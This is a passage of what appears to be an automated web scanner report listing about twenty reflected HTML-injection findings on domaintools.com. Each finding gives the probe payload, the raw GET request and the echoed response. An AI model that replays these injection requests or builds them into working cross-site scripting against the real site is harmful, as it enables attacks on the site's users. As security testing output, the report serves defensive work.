GET /about/privacy-policyef226"><a>8646b24e80f/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:10 GMT
Content-Length: 12149
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=privacy-policyef226"><a>8646b24e80f">
...[SNIP]...

3.114. http://www.domaintools.com/about/terms-of-service/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/terms-of-service/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4917d"><a>f4a878ff38e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/terms-of-service4917d"><a>f4a878ff38e/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:12 GMT
Content-Length: 12159
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=terms-of-service4917d"><a>f4a878ff38e">
...[SNIP]...

3.115. http://www.domaintools.com/about/terms-of-service/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/terms-of-service/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e51af<a>92fcda998db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/e51af<a>92fcda998db/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:21 GMT
Content-Length: 12016
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>92fcda998db">Whois record for "e51af<a>92fcda998db"</a>
...[SNIP]...

3.116. http://www.domaintools.com/about/why-domain-tools/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/why-domain-tools/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 64ffe<a>500c07d19dd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/64ffe<a>500c07d19dd/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:45 GMT
Content-Length: 12016
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>500c07d19dd">Whois record for "64ffe<a>500c07d19dd"</a>
...[SNIP]...

3.117. http://www.domaintools.com/about/why-domain-tools/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/why-domain-tools/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 886bd"><a>dc914d52238 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/why-domain-tools886bd"><a>dc914d52238/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:30 GMT
Content-Length: 12159
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=why-domain-tools886bd"><a>dc914d52238">
...[SNIP]...

3.118. http://www.domaintools.com/api/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /api/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df9f5"><a>c319af131c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /apidf9f5"><a>c319af131c2/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:19 GMT
Content-Length: 12053
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=apidf9f5"><a>c319af131c2">
...[SNIP]...

3.119. http://www.domaintools.com/api/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /api/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 32e88<a>4962493fd8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /api32e88<a>4962493fd8/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:29 GMT
Content-Length: 12024
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>4962493fd8">Whois record for "api32e88<a>4962493fd8"</a>
...[SNIP]...

3.120. http://www.domaintools.com/buy/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45edb"><a>a99fc5a8f9f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy45edb"><a>a99fc5a8f9f/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:33 GMT
Content-Length: 12053
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=buy45edb"><a>a99fc5a8f9f">
...[SNIP]...

3.121. http://www.domaintools.com/buy/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c65df<a>b9b33efc701 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buyc65df<a>b9b33efc701/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:45 GMT
Content-Length: 12032
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>b9b33efc701">Whois record for "buyc65df<a>b9b33efc701"</a>
...[SNIP]...

3.122. http://www.domaintools.com/buy/availability-check/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/availability-check/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9e7e5<a>796330dd95f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/9e7e5<a>796330dd95f/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:09:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:09:09 GMT
Content-Length: 12012
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>796330dd95f">Whois record for "9e7e5<a>796330dd95f"</a>
...[SNIP]...

3.123. http://www.domaintools.com/buy/availability-check/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/availability-check/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a666"><a>fc8a8f6f00b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/availability-check9a666"><a>fc8a8f6f00b/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:08:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:08:57 GMT
Content-Length: 12165
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=availability-check9a666"><a>fc8a8f6f00b">
...[SNIP]...

3.124. http://www.domaintools.com/buy/domain-search/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/domain-search/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70b9b"><a>ea270165358 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/domain-search70b9b"><a>ea270165358/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:08:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:08:57 GMT
Content-Length: 12137
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=domain-search70b9b"><a>ea270165358">
...[SNIP]...

3.125. http://www.domaintools.com/buy/domain-search/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/domain-search/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a42b9<a>23d7ad8b4b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/a42b9<a>23d7ad8b4b4/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:09:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:09:08 GMT
Content-Length: 12012
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>23d7ad8b4b4">Whois record for "a42b9<a>23d7ad8b4b4"</a>
...[SNIP]...

3.126. http://www.domaintools.com/buy/domain-suggestions/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/domain-suggestions/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2cb5a<a>f19f1c6f98 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/2cb5a<a>f19f1c6f98/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:09:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:09:09 GMT
Content-Length: 12004
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>f19f1c6f98">Whois record for "2cb5a<a>f19f1c6f98"</a>
...[SNIP]...

3.127. http://www.domaintools.com/buy/domain-suggestions/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/domain-suggestions/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3adc7"><a>2f6ae51c614 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/domain-suggestions3adc7"><a>2f6ae51c614/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:08:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:08:58 GMT
Content-Length: 12165
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=domain-suggestions3adc7"><a>2f6ae51c614">
...[SNIP]...

3.128. http://www.domaintools.com/buy/domain-typo-finder/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/domain-typo-finder/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33878"><a>6fc30e9bad5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/domain-typo-finder33878"><a>6fc30e9bad5/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:08:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:08:59 GMT
Content-Length: 12165
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=domain-typo-finder33878"><a>6fc30e9bad5">
...[SNIP]...

3.129. http://www.domaintools.com/buy/domain-typo-finder/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/domain-typo-finder/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e785a<a>fa270ecd3a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/e785a<a>fa270ecd3a7/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:09:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:09:10 GMT
Content-Length: 12012
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>fa270ecd3a7">Whois record for "e785a<a>fa270ecd3a7"</a>
...[SNIP]...

3.130. http://www.domaintools.com/buy/dropping-names/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/dropping-names/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8887c<a>4f2671d7934 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/8887c<a>4f2671d7934/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:08 GMT
Content-Length: 12012
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>4f2671d7934">Whois record for "8887c<a>4f2671d7934"</a>
...[SNIP]...

3.131. http://www.domaintools.com/buy/dropping-names/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/dropping-names/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65742"><a>0f8e51c0745 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/dropping-names65742"><a>0f8e51c0745/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:52 GMT
Content-Length: 12145
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=dropping-names65742"><a>0f8e51c0745">
...[SNIP]...

3.132. http://www.domaintools.com/buy/for-sale/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/for-sale/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 696c9<a>dc614c1ac76 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/for-sale696c9<a>dc614c1ac76/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:09:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:09:11 GMT
Content-Length: 12076
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>dc614c1ac76">Whois record for "for-sale696c9<a>dc614c1ac76"</a>
...[SNIP]...

3.133. http://www.domaintools.com/buy/for-sale/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/for-sale/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd84c"><a>81381df8679 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

